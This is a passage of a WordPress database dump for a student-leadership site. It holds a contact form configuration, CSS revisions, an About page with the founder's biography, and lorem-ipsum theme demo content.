you?*\",\"label_hide\":\"1\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}],\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"form_class\":\"\",\"submit_text\":\"Request more info\",\"submit_text_processing\":\"Sending...\",\"submit_class\":\"\",\"antispam\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"sam.demma99@gmail.com\",\"subject\":\"New HPS Submission\",\"sender_name\":\"{field_id=\\\"0\\\"}\",\"sender_address\":\"{field_id=\\\"1\\\"}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for reaching out!\\u00a0 We value your message and will get back to you within 24 hours :-)<\\/p>\",\"message_scroll\":\"1\",\"page\":\"7\",\"redirect\":\"\"}}},\"meta\":{\"template\":\"contact\"}}','Simple Contact Form','','publish','closed','closed','','simple-contact-form','','','2020-10-29 00:44:36','2020-10-29 00:44:36','',0,'http://highperformingstudent.com/?post_type=wpforms&#038;p=2100',0,'wpforms','',0),(2065,1,'2020-10-28 21:24:51','2020-10-28 21:24:51','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 21:24:51','2020-10-28 21:24:51','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2066,1,'2020-10-28 21:25:46','2020-10-28 21:25:46','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Help students build strong habits, communicate more effectively and become better leaders.  We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-10-28 21:25:46','2020-10-28 21:25:46','',7,'http://highperformingstudent.com/2020/10/28/7-revision-v1/',0,'revision','',0),(2067,1,'2020-10-28 21:26:56','2020-10-28 21:26:56','[vc_row full_height=\"yes\" el_id=\"first\" content_width=\"fullwidth\" css=\".vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}\" fullwidth=\"yes\" row_width=\"fullwidth\"][vc_column][vc_custom_heading text=\"Leadership starts with you\" font_container=\"tag:h2|font_size:4.5rem|text_align:center|color:%23000000|line_height:1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_custom_heading text=\"Helping students build strong habits, communicate more effectively, and become better leaders.\" font_container=\"tag:p|font_size:1.1em|text_align:center|color:%23000000|line_height:1.1em\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:500%20bold%20regular%3A500%3Anormal\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}\"][vc_column][logos_carousel images=\"2043,2045,2047,2046,2048\" cols=\"5\" logo_max_height=\"60\"][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column][special_heading title=\"About North\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"65\" text_align=\"center\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"300\" text_style=\"fullwidth\" icon=\"fa-desktop\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"500\" text_style=\"fullwidth\" icon=\"fa-comments-o\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"700\" text_style=\"fullwidth\" icon=\"fa-life-ring\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" style=\"centered\" animation_delay=\"900\" text_style=\"fullwidth\" icon=\"fa-flask\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"what-we-do\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"What we do\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" margin_bottom=\"0\" text_align=\"center\" color=\"white\"][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\r\n<h1>PARALLAX WITH DEGRADE</h1>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\r\n\r\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\r\n\r\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\r\n\r\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\r\n\r\n[/list]\r\n\r\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\r\n\r\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" img_size=\"full\" alignment=\"right\" css_animation=\"right-to-left\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column][special_heading title=\"WHAT OUR FUN FACTORS\" margin_bottom=\"0\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"works\" css=\".vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\"][vc_column][special_heading title=\"Our Portfolio\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][portfolio_grid cats=\"branding,design,photography,video\" posts_nr=\"9\" more_url=\"http://veented.com/themes/north/portfolio/\" style=\"default\" paged_posts=\"no\" thumb_style=\"alt\" fullwidth=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column][special_heading title=\"Our Creative Team\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" animated=\"no\" margin_bottom=\"0\" color=\"dark\"][team_carousel][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"features\" color_scheme=\"white\" bg_overlay=\"dark\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" darken=\"dark\"][vc_column][special_heading title=\"Features With Mobile\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709465308{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"200\" icon=\"fa-camera-retro\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"right\" animation_delay=\"400\" icon=\"fa-cog\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" img_size=\"full\" alignment=\"center\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709472224{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"200\" icon=\"fa-desktop\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" style=\"left\" animation_delay=\"400\" icon=\"fa-paper-plane-o\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][/vc_column][/vc_row][vc_row parallax=\"yes\" bg_overlay=\"dark\" css=\".vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\"][vc_column][testimonials posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column][special_heading title=\"What Clients Says\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\" color=\"dark\"][/vc_column][/vc_row][vc_row el_id=\"what-we\" css=\".vc_custom_1409759211052{padding-bottom: 80px !important;}\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row parallax=\"yes\" color_scheme=\"white\" bg_overlay=\"dark\" content_width=\"fullwidth\" css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" darken=\"dark\" fullwidth=\"yes\"][vc_column][special_heading title=\"Our Featured Works\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\" color=\"dark\"][portfolio_carousel cats=\"branding,design,photography,video\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_subtitle=\"click for our all works\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_subtitle=\"send us a message\" button2_url=\"#contact\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][special_heading title=\"Our Skills\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"services\" bg_overlay=\"light\" css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"OUR SERVICES\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\" color=\"dark\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"prices\" color_scheme=\"white\" bg_overlay=\"darker\" css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\"][vc_column][special_heading title=\"Our Pricing Tables\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\" color=\"dark\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" featured=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_overlay=\"light\" css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\"][vc_column][special_heading title=\"Keep in Touch\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" color=\"dark\"][vntd_contact_form id=\"417\" email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\"][/vc_column][/vc_row][vc_row parallax=\"yes\" el_id=\"contact\" bg_overlay=\"darker\" css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\"][vc_column][contact_block address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row content_width=\"fullwidth\" css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column][gmap marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\"][/vc_column][/vc_row]','Home1','','inherit','closed','closed','','623-revision-v1','','','2020-10-28 21:26:56','2020-10-28 21:26:56','',623,'http://highperformingstudent.com/2020/10/28/623-revision-v1/',0,'revision','',0),(2069,1,'2020-10-28 21:29:39','2020-10-28 21:29:39','.nav-inner .logo a img {\n    max-height: 70px;\n}\n\n#navigation-sticky.dark-nav {\n    background-color: #131313;\n}\n\n.btn-lg, .btn-group-lg>.btn {\n    padding: 18px 25px;\n    font-size: 1.8rem;\n    line-height: 1.33;\n    border-radius: 4px;\n	  border-color: #a00006;\n	  font-weight: 700;\n	  font-family: Roboto;\n	  text-transform: uppercase;\n	  background-color: #a00006\n}','north','','inherit','closed','closed','','39-revision-v1','','','2020-10-28 21:29:39','2020-10-28 21:29:39','',39,'http://highperformingstudent.com/2020/10/28/39-revision-v1/',0,'revision','',0),(2070,1,'2020-10-28 22:16:45','2020-10-28 22:16:45','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Help students build strong habits, communicate more effectively and become better leaders.  We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"THE RESEARCH\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">All of our programs and initiatives are built on evidence-based research.  Of course, we walk students through the \"how\", but more importantly, we explain the \"why\".  Giving your students a strong reason to act on the information is our obsession.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/3\"][vc_single_image image=\"15\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>VISON</strong></p>\r\n<p style=\"text-align: center;\"><em><strong><span style=\"text-decoration: underline;\">What you focus on is sought out by your Reticular Activating System.</span> </strong></em>(Learn more from the University of Minnesota <a href=\"https://extension.umn.edu/two-you-video-series/ras\">here</a>)</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"15\" img_size=\"medium\" alignment=\"center\"][vc_column_text]\r\n<p style=\"text-align: center;\"><strong>ROUTINES</strong></p>\r\n<p style=\"text-align: 